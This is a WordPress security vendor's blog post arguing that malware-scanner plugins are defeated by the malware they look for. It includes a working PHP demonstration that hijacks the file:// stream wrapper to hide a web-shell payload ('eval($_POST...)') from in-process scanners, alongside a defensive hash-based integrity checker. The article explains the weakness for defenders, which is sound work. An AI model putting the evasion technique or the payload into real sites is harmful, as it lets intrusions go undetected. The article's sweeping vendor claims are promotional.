Solid Security

Why WordPress Malware Scanners Are Worthless

Malware in the wild is actively defeating the scanners on WordPress sites whose security plugins do not protect them. Is your site next?

Dan Knauss

New research from Snicco, WeWatchYourWebsite, Automattic-backed GridPane, and Patchstack reveals that WordPress malware scanners that run as plugins inside a compromised environment are fundamentally flawed. Malware scanners are cleanup tools at best for already-compromised sites. They are not a solid line of defense, and they are being actively defeated by malware in the wild right now. Leave malware detection to a quality host. Focus your security policies on login authentication hardening, user management, proper delegation of privileges, and vigilant version management.

So 2000-and-Late: Malware Scanners Have Outlived Their Usefulness

Malware detection plugins for WordPress date back to around 2011, when SQL injection attacks were common and effective. Anyone working with WordPress back then will remember TimThumb, a widely used image-resizing script bundled with countless themes. Zero-day exploits against it had horrible results for millions of sites.

WordPress security plugins grew out of that emergency context, as a reaction to it. Some security plugins today still look like Norton Security and McAfee Anti-Virus, the popular security applications for Windows of 20 to 30 years ago. But as John McAfee said after leaving the company he created, his antivirus scanner had been turned into “bloatware.” In his opinion, it was “the worst software in the world.”

Similar conclusions could be drawn today about WordPress malware scanners based on the recent findings of several WordPress security researchers.

“An already compromised environment cannot be trusted to analyze itself.”

Calvin Alkan, Founder of Snicco

An Illusion of Safety: WordPress Malware Scanners Put to the Test

In the first part of a series called “Malware Madness: Why everything you know about your WordPress Malware Scanner is wrong,” WordPress security researcher Calvin Alkan (Founder of the security company Snicco) shares some of his work. Alkan worked with Patrick Gallagher (GridPane CEO and Co-Founder) and Thomas Raef (Owner, WeWatchYourWebsite.com) to see if malware scanners could be defeated. Unsurprisingly, it turns out they can be defeated — very easily. Patchstack provided independent confirmation of Alkan’s results.

Local Scanners: The Call is Coming from Inside the House

In their tests, Alkan and his collaborators first looked at local scanners. Wordfence, WPMU Defender, the free version of All-In-One Security (AIOS), and NinjaScanner run on the same server as the WordPress site they are installed on, inside the same PHP process that executes WordPress and, on a compromised site, the malware as well. Nothing stops malware that loads before the scanner from interfering with it: it can disable any security plugins it detects, whitelist itself (a tactic reported in 2018), or manipulate what the scanner reads so the intrusion is never flagged.

“Both the Malware Scanner and the Malware run within the same PHP process. This means malware can manipulate or tamper with the scanner’s functionality — an equivalent scenario would be a defendant serving as their own judge in a court trial.”

Calvin Alkan, “Malware Madness Part 1”

Next, Alkan and his partners produced working proofs-of-concept to defeat malware scanners. (They’ve also offered to share their exploit kits privately with security researchers and vendors.) According to Patchstack CEO Oliver Sild, the exploit kits consist of only a few lines of code.

Alkan also found that “rendered” malware, “which dynamically constructs itself using PHP,” is undetectable by local malware scanners: the malicious code only exists at runtime, so there is no static string on disk for a signature to match. Finally, the local scanners failed to detect “in-process” malware, which “executes once and then deletes itself from the system, leaving no trace of its presence.”

Remote Scanners: Defeated By Evidence Tampering and Crime Scene Cleansing

Scanners that perform their analysis on a remote server include MalCare, Virusdie, All-In-One Security (AIOS) Pro, Sucuri, and Jetpack Scan. These newer remote scanning methods have several advantages, including a smaller footprint and less impact on your server’s performance, since local scanners do their work with your site’s own server resources. The analysis itself is also out of reach of an active infection, because it does not run in the same PHP process as the malware. The collection step that feeds it, however, still does.

What remote scanners are vulnerable to is malware that manipulates the data sent back to the remote server for analysis. Alkan built another proof-of-concept that demonstrates remote scanners can be defeated in this way — by hiding the “evidence” of a malware infection. Oliver Sild confirmed this result as well:

“Data tampering can be achieved conceptually with the local plugin being a target of deception. We have received a proof of concept that clearly demonstrates this.”

Oliver Sild, CEO of Patchstack, in Snicco’s report, “Malware Madness Part 1”

A slightly different malware tactic might involve “scrubbing the crime scene” and leaving no trace of infection to be scanned. Alkan suggested this is possible but did not provide a proof of concept.
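To make the same-process problem concrete for both the local scanners above and the collection half of a remote scanner, here is an added example, constructed for this article and not code from Snicco’s report or from any of the scanners named. A toy signature scanner reads files with `file_get_contents`, exactly as a plugin scanner (or the local agent of a remote scanner) does before matching or uploading. A second class, loaded earlier in the same PHP process, replaces the built-in `file://` stream wrapper so that reads of its own file come back with the payload stripped. The file on disk never changes; only what this process can see changes. The file names, signature list and payload are all made up.

```php
<?php
declare(strict_types=1);

// Constructed signature list; real scanners carry thousands, two show the mechanism.
const SIGNATURES = ['eval($_POST', 'eval(base64_decode('];

// The scanner side. Like any in-process scanner, it trusts the bytes the runtime hands it.
function scan(array $paths): array
{
    $hits = [];
    foreach ($paths as $path) {
        $code = (string) file_get_contents($path);
        foreach (SIGNATURES as $sig) {
            if (str_contains($code, $sig)) {
                $hits[] = $path;
                break;
            }
        }
    }
    return $hits;
}

// The malware side. Loaded before the scanner in the same request (an mu-plugin is the
// usual spot), it swaps the built-in file:// wrapper for one that serves a cleaned image
// of its own file. Read-only support is all a scanner exercises; writes are not handled.
final class CleanView
{
    private static string $infected = '';
    private static string $payload = '';
    private string $buf = '';
    private int $pos = 0;
    public $context;   // the engine assigns this; it must exist as a public property

    public static function install(string $infected, string $payload): void
    {
        self::$infected = $infected;
        self::$payload = $payload;
        stream_wrapper_unregister('file');
        stream_wrapper_register('file', self::class);
    }

    // Run one operation against the real file:// wrapper, then put ourselves back.
    private static function withRealWrapper(callable $op): mixed
    {
        stream_wrapper_restore('file');
        try {
            return $op();
        } finally {
            stream_wrapper_unregister('file');
            stream_wrapper_register('file', self::class);
        }
    }

    public function stream_open(string $path, string $mode, int $options, ?string &$opened_path): bool
    {
        $data = self::withRealWrapper(fn () => @file_get_contents($path));
        if ($data === false) {
            return false;
        }
        if ($path === self::$infected) {
            $data = str_replace(self::$payload, '', $data);   // the "evidence" vanishes here
        }
        $this->buf = $data;
        return true;
    }

    public function stream_read(int $count): string|false
    {
        $chunk = substr($this->buf, $this->pos, $count);
        $this->pos += strlen($chunk);
        return $chunk;
    }

    public function stream_eof(): bool { return $this->pos >= strlen($this->buf); }
    public function stream_stat(): array { return ['size' => strlen($this->buf)]; }
    public function stream_set_option($option, $arg1, $arg2): bool { return false; }
    public function stream_close(): void {}
}

// Demo against a constructed two-file "site" in a temp directory.
function demo(): array
{
    $dir = sys_get_temp_dir() . '/scanner-demo-' . getmypid();
    mkdir($dir);
    $clean = $dir . '/hello.php';
    $infected = $dir . '/wp-cache-helper.php';   // constructed name
    $payload = 'eval($_POST["c"]);';
    file_put_contents($clean, "<?php echo 'hello';\n");
    file_put_contents($infected, "<?php\n" . $payload . "\n");

    $before = scan([$clean, $infected]);   // flags the infected file
    CleanView::install($infected, $payload);
    $after = scan([$clean, $infected]);    // flags nothing
    stream_wrapper_restore('file');        // back to the real wrapper for cleanup
    $onDisk = str_contains((string) file_get_contents($infected), $payload);
    unlink($clean);
    unlink($infected);
    rmdir($dir);
    return ['before' => $before, 'after' => $after, 'payload_still_on_disk' => $onDisk];
}

print_r(demo());
```

Run it with PHP 8 from the command line: `before` lists the infected file, `after` is empty, and `payload_still_on_disk` is true. The scanner did not lie; it reported exactly what its own process showed it. A remote scanner’s plugin component reading the same file for upload receives the same cleaned bytes, which is the data tampering Sild confirmed. Real malware can hook further down than this (any function or filter the scanner relies on is fair game), but nothing here needs more than a few dozen lines, in line with what Patchstack said about the size of the proof-of-concept kits.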

It is important to note that file integrity scanning, which looks for unauthorized changes, can help when you are trying to detect a malware infection. This type of scan compares hashes of your local WordPress core, plugin, and theme files against known-good copies held in a protected remote repository and reports any unofficial change. Unfortunately, when the hashing itself runs inside the site’s PHP process, malware can feed the comparison a clean image of the files it modified, and change detection is defeated like any other in-process check.
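One check a practitioner would want alongside host-side scanning is a change-detection pass that runs in a separate process, where there is nothing for in-process malware to hook. Below is an added example of such a check, constructed for this article and not Solid Security’s or any named vendor’s code. It is meant to run as a command-line PHP script from cron or an SSH session, under a different system user than the web server, against a baseline recorded at deploy time and refreshed after every legitimate update. The script name, the manifest location, and the ignore list are assumptions. Two caveats: a baseline taken after a compromise blesses the malware, and a manifest the web user can write is itself a target, so keep it outside the web root and read-only to that user.

```php
<?php
declare(strict_types=1);

// Usage (from cron or an SSH session, never from inside the site's own PHP process):
//   php integrity.php baseline /var/www/site /root/site.manifest.json
//   php integrity.php verify   /var/www/site /root/site.manifest.json

// Relative paths that legitimately churn and would drown the report (constructed list,
// tune per site). Everything else, including wp-config.php and mu-plugins, is tracked.
const IGNORE_PREFIXES = ['wp-content/uploads/', 'wp-content/cache/'];

// sha256 of every regular file under $root, keyed by path relative to $root.
function hash_tree(string $root): array
{
    $root = rtrim($root, '/');
    $hashes = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $rel = substr($file->getPathname(), strlen($root) + 1);
        foreach (IGNORE_PREFIXES as $prefix) {
            if (str_starts_with($rel, $prefix)) {
                continue 2;
            }
        }
        $hashes[$rel] = hash_file('sha256', $file->getPathname());
    }
    ksort($hashes);
    return $hashes;
}

// Compare a stored baseline with the tree as it is now. Added files matter as much as
// modified ones: a dropped backdoor is a new file, not a changed one.
function diff_manifest(array $baseline, array $current): array
{
    $modified = [];
    foreach (array_intersect_key($baseline, $current) as $rel => $hash) {
        if ($current[$rel] !== $hash) {
            $modified[] = $rel;
        }
    }
    return [
        'added'    => array_keys(array_diff_key($current, $baseline)),
        'removed'  => array_keys(array_diff_key($baseline, $current)),
        'modified' => $modified,
    ];
}

function main(array $argv): int
{
    $cmd = $argv[1] ?? '';
    $root = $argv[2] ?? '';
    $manifest = $argv[3] ?? '';
    if ($cmd === 'baseline' && is_dir($root)) {
        file_put_contents($manifest, json_encode(hash_tree($root), JSON_PRETTY_PRINT));
        return 0;
    }
    if ($cmd === 'verify' && is_dir($root) && is_file($manifest)) {
        $baseline = json_decode((string) file_get_contents($manifest), true) ?? [];
        $report = diff_manifest($baseline, hash_tree($root));
        echo json_encode($report, JSON_PRETTY_PRINT), "\n";
        return array_filter($report) ? 1 : 0;   // non-zero exit lets cron or monitoring alert
    }
    fwrite(STDERR, "usage: php integrity.php baseline|verify <site-root> <manifest>\n");
    return 2;
}

exit(main($argv));
```

The process boundary is what makes this trustworthy, not the language: the CLI interpreter does not load WordPress, so nothing in wp-content or mu-plugins runs here. Confirm that the CLI binary has no `auto_prepend_file` set (`php -i | grep auto_prepend_file` should show it empty), because a prepended file would be pulled into this process as well. Hashes from the baseline can additionally be cross-checked against the official WordPress.org checksums for core and plugin releases to catch a baseline that was taken too late.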

Not Just a Hypothetical: Malware is Already Disabling WordPress Security Scanners in the Wild

Following Alkan’s exploit kits, the biggest reveal in Snicco’s report comes from Thomas Raef, the CEO of We Watch Your Website, which detects and cleans up hacked WordPress sites:

“Over the last 60 days, 52,848 sites got hacked with WordFence installed prior to infection. The installed malware tampered with WordFence files in 14% of the cases (7,399). Other popular services had even higher percentages; MalCare coming in at 22%, and VirusDie at 24%.”

Thomas Raef, Founder of We Watch Your Website, in Snicco’s report, “Malware Madness Part 1”

For a detailed account of We Watch Your Website’s analysis, see Thomas Raef’s report, “How We Identified Nearly 150K Hacked WordPress Sites in 60 Days.”

That is game over for malware-scanning plugins. It tells us that WordPress malware scanning is pure security theater — “the practice of taking security measures that are considered to provide the feeling of improved security while doing little or nothing to achieve it.”

No doubt this has been going on for a long time, too.

Security industry veteran and Kadence marketing director Kathy Zant told Alkan:

“Over the course of about 18 months, I was cleaning WordPress sites for a well-known company in WordPress, removing malware from well over 2,000 sites during my tenure. The earliest timeframe I saw [malware defeating malware scans] was in mid to late 2017. [….] I am sure it still exists. And there very well could be additional variants that perform similar actions, or even worse.”

Kathy Zant, CEO of Zantastic LLC, in Snicco’s report, “Malware Madness Part 1”

That’s the bad news: malware scanners can’t be trusted. The good news is they have never offered a real defense. If all you’ve lost is an illusion of security, that is actually a step toward gaining real security.

How to Secure Your WordPress Site — Properly

After a bombshell report like Snicco’s, the big question is, “How can WordPress sites achieve high confidence in their security?”

Alkan believes security methods must be tailored to each server stack, and that server-side malware scanning performed by the host, outside the site’s own PHP process, is the only worthwhile type of scanning for site owners.

“WordPress security plugins should ONLY be doing stuff that can best be done at the application/PHP layer,” he emphasizes.

“The WordPress community needs to shift its security approach from detection to prevention while maintaining the importance of malware scanning to verify the efficacy of the ‘higher layers’ of security.”

Calvin Alkan

Strong user login security, such as two-factor authentication and passkeys coupled with session security, is an area where Alkan says WordPress plugins can help, plugins like iThemes Security (now Solid Security). That has always been the guiding philosophy of our development team: a security plugin is best suited to hardening sites and decreasing the attack surface.

Other essential ways to harden your WordPress site’s defenses include careful user management following the principle of least privilege: never give a user more power than necessary. Hold more privileged users to a higher standard: 2FA, passkeys, trusted devices, and strong passwords that have never appeared in a known breach.

Attackers today deliberately target small to mid-sized businesses with credential stuffing, phishing, and spear phishing. These attacks exploit weak login authentication and human error, combining brute force with social engineering to compromise individual user accounts. Armed with a hijacked user account, an attacker can do a lot of damage, and even more if they also find a vulnerable plugin to exploit. Once inside your system, an attacker can create backdoors to slip back in at any time.

A security plugin that emphasizes a malware scanner isn’t going to stop them.

Learn more about malware scanners and WordPress security at the WP Builds podcast.

Many of the people referenced in this article took part in this series of four interviews with WP Builds’ host, Nathan Wrigley:

  1. Calvin Alkan – Snicco
  2. Akshat Choudhary – Malcare
  3. Dan Knauss – SolidWP
  4. Thomas J. Raef – We Watch Your Website

Solid Security is part of Solid Suite — The best foundation for WordPress websites.

Every WordPress site needs security, backups, and management tools. That’s Solid Suite — an integrated bundle of three plugins: Solid Security, Solid Backups, and Solid Central. You also get access to Solid Academy’s learning resources for WordPress professionals. Build your next WordPress website on a solid foundation with Solid Suite!
